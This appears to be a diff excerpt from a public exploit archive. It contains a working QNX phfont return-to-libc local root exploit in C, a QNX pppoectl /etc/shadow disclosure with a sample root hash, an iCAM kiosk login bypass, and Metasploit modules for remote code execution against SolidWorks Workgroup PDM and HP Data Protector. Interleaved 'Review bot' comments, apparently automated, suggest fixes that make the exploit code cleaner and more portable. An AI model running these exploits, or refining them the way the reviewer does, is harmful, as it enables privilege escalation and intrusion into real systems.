* and PATH will be set to /tmp. Once /tmp/sh is been executed, the exploit
* will launch the setuid /tmp/shell yielding the user euid=0.
*
* - example:
* $ uname -a
* QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
* $ id
* uid=100(user) gid=100
* $ ./qnx-phfont
* QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013
*
* [-] system(): 0xb031bd80
* [-] exit(): 0xb032b5f0
* [-] sh: 0xb030b7f8
* [-] now dropping into root shell...
* # id
* uid=100(user) gid=100 euid=0(root)
*
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <dlfcn.h>
#include <err.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define HEADER "QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013"
#define VULN "PHOTON_PATH="
#define OFFSET 416
#define FILENAME "/tmp/sh"
static void createshell(void);
static void fail(void);
static void checknull(unsigned int addr);
static unsigned int find_string(char *s);
static unsigned int is_string(unsigned int addr, char *string);
static unsigned int find_libc(char *syscall);
void createshell(void) {
int fd;
char *s="/bin/cp /bin/sh /tmp/shell\n"
"/bin/chmod 4755 /tmp/shell\n"
"/bin/chown root:root /tmp/shell\n";
fd = open(FILENAME, O_RDWR|O_CREAT, S_IRWXU|S_IXGRP|S_IXOTH);
if (fd < 0)
errx(1, "cannot open %s for writing", FILENAME);
write(fd, s, strlen(s));
close(fd);
}
void
checknull(unsigned int addr)
{
if (!(addr & 0xff) || \
!(addr & 0xff00) || \
!(addr & 0xff0000) || \
!(addr & 0xff000000))
errx(1, "return-to-libc failed: " \
"0x%x contains a null byte", addr);
}
void
fail(void)
{
printf("\n");
errx(1, "return-to-libc failed");
}
unsigned int
is_string(unsigned int addr, char *string)
{
char *a = addr;
signal(SIGSEGV, fail);
if (strcmp(a, string) == 0)
return(0);
return(1);
}
unsigned int
find_string(char *string)
{
unsigned int i;
printf("[-] %s: ", string);
for (i = 0xb0300000; i < 0xdeadbeef; i++) {
if (is_string(i, string) != 0)
continue;
printf("0x%x\n", i);
checknull(i);
return(i);
}
return(1);
}
unsigned int
find_libc(char *syscall)
{
void *s;
unsigned int syscall_addr;
if (!(s = dlopen(NULL, RTLD_LAZY)))
errx(1, "error: dlopen() failed");
if (!(syscall_addr = (unsigned int)dlsym(s, syscall)))
errx(1, "error: dlsym() %s", syscall);
printf("[-] %s(): 0x%x\n", syscall, syscall_addr);
checknull(syscall_addr);
return(syscall_addr);
return(1);
}
int
main(int argc, char **argv)
{
unsigned int system_addr;
unsigned int exit_addr;
unsigned int sh_addr;
char env[440];
printf("%s\n\n", HEADER);
createshell();
system_addr = find_libc("system");
exit_addr = find_libc("exit");
sh_addr = find_string("sh");
memset(env, 0xEB, sizeof(env));
memcpy(env + OFFSET, (char *)&system_addr, 4);
memcpy(env + OFFSET + 4, (char *)&exit_addr, 4);
memcpy(env + OFFSET + 8, (char *)&sh_addr, 4);
setenv("PHOTON_PATH", env, 0);
system("PATH=/tmp:/bin:/sbin:/usr/bin:/usr/sbin /usr/photon/bin/phfont");
printf("[-] now dropping into root shell...\n");
sleep(2);
if (unlink(FILENAME) != 0)
printf("error: cannot unlink %s\n", FILENAME);
system("/tmp/shell");
return(0);
}
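Review bot: `find_libc` ends with an unreachable `return(1);` after `return(syscall_addr);`, and `is_string` assigns an integer to a pointer without a cast (`char *a = addr;`), which any compiler at `-Wall` flags; `char *a = (char *)addr;` and dropping the dead return would make the file build cleanly (the same unreachable return appears in `find_libc` of the preceding 32154.c section). The SIGSEGV handler `fail` calls `printf` and `errx`, neither of which is async-signal-safe, so the "return-to-libc failed" message is not guaranteed to be emitted. The return values of `write()` in `createshell` and `setenv()` in `main` are ignored, so a short write or a failed environment update goes unreported. `main` declares `argc`/`argv` but uses neither; `int main(void)` would match the prototype style used by the other functions in the file.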

26
platforms/qnx/local/32156.txt Executable file

@ -0,0 +1,26 @@
#
# QNX 6.4.x/6.5.x pppoectl disclose /etc/shadow by cenobyte 2013
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /sbin/pppoectl allows any user to gain access to privileged
# information such as the root password hash.
#
# The vulnerability exists because of a failure to drop privileges or check the
# permissions and ownership on the file specified as the configuration file.
#
# If a user specifies a file such as /etc/shadow, pppoectl will display the
# first line of the shadow file in the error output.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
$ id
uid=100(user) gid=100
$ ls -la /etc/shadow
-rw------- 1 root root 69 Oct 10 16:55 /etc/shadow
$ pppoectl -f /etc/shadow lo0
pppoectl: bad parameter: "root:QSkSGrRQOSLoO:1380296317:0:0"


@ -0,0 +1,24 @@
# Exploit Title: iCAM Workstation Control Software Local Authentication Bypass
# Google Dork:
# Vendor: Insight Media Internet Limited is based in the North West of England, and has 10 years experience in developing both internet and software solutions.
Our staff are focused and committed to offering the best possible service and assistance to customers both old and new.
# Product: iCAM Workstation Control is a PC booking system designed to give organisations complete control over the access and pre-booking of publicly accessible workstations.
# Details: There is a simple local exploit in iCAM workstation control which allows a user to bypass the login screen and access the Local Disk Drive to launch applications such as a Web Browser.
# Exploitation-Technique: Local
# Date: 06-03-2014
# Exploit Author: StealthHydra
# Vendor Homepage: http://www.insight-media.co.uk/index.php?id=9
# Software Link:
# Version: 4.8.0.0
# Tested on: Windows 7
# CVE :
# Method:
=========
1.) From the login screen most keys are blocked accept alphanumeric keys. However if you press the Alt & Tab hotkey then you can access the desktop of the user currently running the iCAM client.
2.) Although a blank desktop, you can then press the shortcut for the Windows Help feature - Windows key & F1
3.) Once in the windows help if you type in a random string into the search box and press enter, windows explorer appears.
4.) Once in the windows explorer you can launch various applications by navigating the windows file system.

150
platforms/windows/remote/32163.rb Executable file

@ -0,0 +1,150 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write',
'Description' => %q{
This module exploits a remote arbitrary file write vulnerability in
SolidWorks Workgroup PDM 2014 SP2 and prior.
For targets running Windows Vista or newer the payload is written to the
startup folder for all users and executed upon next user logon.
For targets before Windows Vista code execution can be achieved by first
uploading the payload as an exe file, and then upload another mof file,
which schedules WMI to execute the uploaded payload.
This module has been tested successfully on SolidWorks Workgroup PDM
2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mohamed Shetta <mshetta[at]live.com>', # Initial discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['EDB', '31831'],
['OSVDB', '103671']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets' =>
[
# Tested on:
# - SolidWorks Workgroup PDM 2011 SP0 (Windows XP SP3 - EN)
# - SolidWorks Workgroup PDM 2011 SP0 (Windows 7 SP1 - EN)
['Automatic', { 'auto' => true } ], # both
['SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)', {}],
['SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)', {}],
],
'Privileged' => true,
'DisclosureDate' => 'Feb 22 2014',
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [true, 'Traversal depth', 10]),
Opt::RPORT(30000)
], self.class)
end
def peer
"#{rhost}:#{rport}"
end
#
# Check
#
def check
# op code
req = "\xD0\x07\x00\x00"
# filename length
req << "\x00\x00\x00\x00"
# data length
req << "\x00\x00\x00\x00"
connect
sock.put req
res = sock.get_once
disconnect
if !res
vprint_error "#{peer} - Connection failed."
Exploit::CheckCode::Unknown
elsif res == "\x00\x00\x00\x00"
vprint_status "#{peer} - Received reply (#{res.length} bytes)"
Exploit::CheckCode::Detected
else
vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
Exploit::CheckCode::Safe
end
end
#
# Send a file
#
def upload(fname, data)
# every character in the filename must be followed by 0x00
fname = fname.scan(/./).join("\x00") + "\x00"
# op code
req = "\xD0\x07\x00\x00"
# filename length
req << "#{[fname.length].pack('l')}"
# file name
req << "#{fname}"
# data length
req << "#{[data.length].pack('l')}"
# data
req << "#{data}"
connect
sock.put req
res = sock.get_once
disconnect
if !res
fail_with(Failure::Unknown, "#{peer} - Connection failed.")
elsif res == "\x00\x00\x00\x00"
print_status "#{peer} - Received reply (#{res.length} bytes)"
else
print_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
end
end
#
# Exploit
#
def exploit
depth = '..\\' * datastore['DEPTH']
exe = generate_payload_exe
exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
if target.name =~ /Automatic/ or target.name =~ /Vista/
print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)")
upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe)
end
if target.name =~ /Automatic/ or target.name =~ /XP/
print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe)
mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
end
register_file_for_cleanup("#{::File.basename(exe_name)}")
end
end
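Review bot: `upload` packs the two length fields with `pack('l')`, which is native-endian, so the request layout depends on the host running the module; `[fname.length].pack('V')` and `[data.length].pack('V')` would pin the byte order to match the little-endian op-code literal `"\xD0\x07\x00\x00"` already used in the same method. In `exploit`, `target.name =~ /Automatic/ or target.name =~ /Vista/` (and the XP branch below it) uses `or` where `||` is the idiom and avoids precedence surprises. `req << "#{fname}"` and `req << "#{data}"` interpolate values that are already strings; `req << fname` reads more directly. `if !res` in both `check` and `upload` is conventionally written `unless res`.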

206
platforms/windows/remote/32164.rb Executable file

@ -0,0 +1,206 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Backup Client Service Remote Code Execution',
'Description' => %q{
This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code
execution. The vulnerability exists in the EXEC_BAR operation, which allows to
execute arbitrary processes. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2347' ],
[ 'BID', '64647' ],
[ 'ZDI', '14-008' ],
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ],
[ 'URL', 'http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html' ]
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector 6.20 build 370 / VBScript CMDStager', { } ],
[ 'HP Data Protector 6.20 build 370 / Powershell', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 02 2014'))
register_options(
[
Opt::RPORT(5555),
OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe'])
],
self.class)
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end
if minor < 21
return Exploit::CheckCode::Appears
elsif minor == 21
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Detected
end
end
def exploit
if target.name =~ /VBScript CMDStager/
# 7500 just in case, to be sure the command fits after
# environment variables expansion
execute_cmdstager({:linemax => 7500})
elsif target.name =~ /Powershell/
# Environment variables are not being expanded before, neither in CreateProcess
command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "")
if command.length > 8000
# Windows 2008 Command Prompt Max Length is 8191
fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
end
print_status("#{peer} - Exploiting through Powershell...")
exec_bar(datastore['CMDPATH'], command, "\x00")
end
end
def peer
"#{rhost}:#{rport}"
end
def build_pkt(fields)
data = "\xff\xfe" # BOM Unicode
fields.each do |v|
data << "#{Rex::Text.to_unicode(v)}\x00\x00"
data << Rex::Text.to_unicode(" ") # Separator
end
data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
return [data.length].pack("N") + data
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
if resp.nil?
return nil
end
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
end
def exec_bar(cmd, *args)
connect
pkt = build_pkt([
"2", # Message Type
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"11", # Opcode EXEC_BAR
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"#{cmd}", # Executable
rand_text_alpha(8)
].concat(args))
sock.put(pkt)
# In my testings the default timeout (10) isn't enough
begin
res = sock.get_once(-1, 20)
rescue EOFError # happens when using the Powershell method
disconnect
return
end
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
disconnect
end
def exec_bar?(data)
return false if data.blank?
data_unpacked = data.unpack("NnVv")
data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0
end
def execute_command(cmd, opts = {})
exec_bar(datastore['CMDPATH'], "/c #{cmd}", "\x00")
end
def get_vbs_string(str)
vbs_str = ""
str.each_byte { |b|
vbs_str << "Chr(#{b})+"
}
return vbs_str.chomp("+")
end
# Make the modifications required to the specific encoder
# This exploit uses an specific encoder because quotes (")
# aren't allowed when injecting commands
def execute_cmdstager_begin(opts)
var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
decoded_file = "#{var_decoded}.exe"
encoded_file = "#{var_encoded}.b64"
@cmd_list.each do |command|
# Because the exploit kills cscript processes to speed up and reliability
command.gsub!(/cscript \/\/nologo/, "wscript //nologo")
command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file))
command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file))
end
end
end
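Review bot: In `check`, the `elsif minor == 21` and `else` branches both return `Exploit::CheckCode::Detected`, so the three-way split collapses to `minor < 21 ? Exploit::CheckCode::Appears : Exploit::CheckCode::Detected`; if a distinct result for patched builds was intended, that intent is lost in the current code. The `$1` read after the version regex would be clearer as `Regexp.last_match(1)` or a named capture such as `(?<minor>\d+)`. In `exec_bar`, `fail_with` is called before `disconnect`, so the socket opened by `connect` stays open on the failure path unless the framework's cleanup closes it; calling `disconnect` before the `unless exec_bar?(res)` check removes that dependency. The local `ommni` in `get_fingerprint` looks like a typo for `omni`.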